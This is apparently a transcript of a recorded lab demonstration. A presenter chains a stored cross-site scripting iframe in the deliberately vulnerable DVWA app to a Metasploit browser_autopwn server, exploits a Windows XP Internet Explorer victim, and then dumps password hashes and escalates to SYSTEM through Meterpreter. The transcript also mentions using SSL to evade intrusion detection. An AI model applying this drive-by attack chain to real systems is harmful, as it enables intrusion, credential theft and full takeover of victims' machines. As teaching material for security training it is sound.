Hey guys, this is Chris with the Metasploit browser AutoPwn demo. So for this demo, we have a topology of a DBWA web server machine. We have an attacking machine running Fedora 14, and we have a victim machine, which is XP, running Internet Explorer. So for the initial part of this demo, we're going to go to DBWA. Let's see, I'll bring this back up. So in our web browser, we're going to surf to the vulnerable web server. So http://68.254.12 is our web server. Username admin, password. Alright, so from here we're going to go to DBWA security. We're going to set to low, submit. This should be set to low. Basically the difference between low, medium, and high security on this is just the PHP script that you're going to have to defeat. For this part, cross-site scripting, we're going to be doing the stored. It also has SQL injection, brute force, command execution, some really cool stuff. So check that out later. So we're going to go to cross-site scripting stored. So let's see what we can do. We're going to try to inject an iframe into this, like you guys heard about in the first part of the presentation. So name is going to be Chris. So this is very similar to what you'd see like when somebody says sign my guest book on their website. So we're going to insert iframe src equals http. So what this iframe is going to do is redirect them back to our malicious server, which is the browser AutoPwn server. So our IP address is 192.168.254.17. And we're going to be running that server on port 8080, so that's what we want it connect to. So signed guestbook. All right, cool. So we were able to actually inject that iframe. It shows here, you can see unable to connect. That's fine though, because obviously our web server is not up yet. So that's the next part. We're going to start up our malicious web server. So as you can see, we already have Metasploit up. Actually, we had 2 instances of that. All right, we're going to use this one. So to load up our browser AutoPwn exploit, we're going to do use auxiliary, because this is an auxiliary module server. It's a server browser AutoPwn. Cool. I love autocomplete. We're going to do a show options to see what we can actually set for this. So let's blow this up real big. Show options again. Okay, so down here you see we have lhost, so that's our local host. We have server host, server port. We want to be running on port 8080. SSL is set to false. Like Kevin probably talked about earlier, we can set SSL to true, and then if somebody was to connect to us, we first set up an SSL connection, and then send our exploit over SSL, the encrypted link. The idea of this is to bypass any sort of IDS, IPS, so all they're going to see is encrypted traffic going across the network instead of actually seeing the exploit go across. So SSL cert, we can add an SSL cert if we want. Version SSL 3. Well, we're not going to use it, so it doesn't really matter anyway. And URI path. So we're going to set that to the root. So that is where our actual malicious server, where we want to direct people initially to the server. So we're just going to set it to root. I think by default it's root, but let's explicitly set it anyway. So set URI path / and then we're also going to set lhost to 192.168.254.17. Did we already do that? I don't think so. Show options, just to make sure all this took effect. Alright, looks good to me. We're going to type exploit. This isn't actually, usually in Metasploit when you say exploit, you're actually exploiting something or sending something over the wire. This is basically just firing up the web server, loading up these exploit modules. As you can see, there's Safari, Apple QuickTime, exploit, some of these Mozilla. Okay. Looks good. Some Java too, actually a lot of Java exploits. Okay, so done, found 24 exploit modules. Again, this is framework 4. So server started, local IP shows down here what we're running on. Cool. So enter a few times and we get our prompt back. So right now we should all be all set. We have our website that we exploited. We set up our server. So now we're going to try to browse to that website with our Internet Explorer. That is a vulnerable version, 254.12. So again, we're going to go to the website, admin, password. Okay. Again, DBWA security. We're going to set it to low. We're going to check out XSS stored. So as you can see, it's trying to load something, not able to right now. Actually, okay. For some reason I can't scroll. Looks like it just crashed out. Let's see what we ended up seeing over here. All right, excellent. So it showed that we got a request. It was able to fingerprint Microsoft Windows, XP, Service Pack 3, English US, architecture is x86. Excellent. So then it was responding with exploits, MS03020, sending stage. Great. So it was able to pull in Meterpreter. We opened a Meterpreter session. Because it looks like it knew it was in Explorer.exe and it probably had a hunch that the browser was going to crash out just because of the nature of the exploit, it was able to spawn Notepad and then migrate into Notepad. So as you can see on the other machine, let's flip back over to that. Internet Explorer is not actually still running. It crashed out. But we should actually have a shell because we're still hanging out in Notepad. So let's do sessions-l to list our sessions. Great, we got one. -i1, so this will let us interact with session 1. And then let's just do a basic ls, hash dump. Alright, so our hashes, we want to try to crack some hashes. Get privs. Let's see if we can own this thing. Oh, get system. This is privilege escalation. Automated privilege escalation, got system via technique 1. Alright, so basically now we are administrator. So that's about it. As you can see, all that had to happen was actually for somebody to open Internet Explorer, serve to a site that had an iframe injected into it. I shouldn't say it never came to this server because it did come to the malicious server, but not on purpose. Obviously, it was an iframe that was able to redirect it. Cross-site scripting in action. So there you go. Cross-site scripting dropped a shell. That's about the end of our demonstration. Hope you guys enjoyed it. Take care.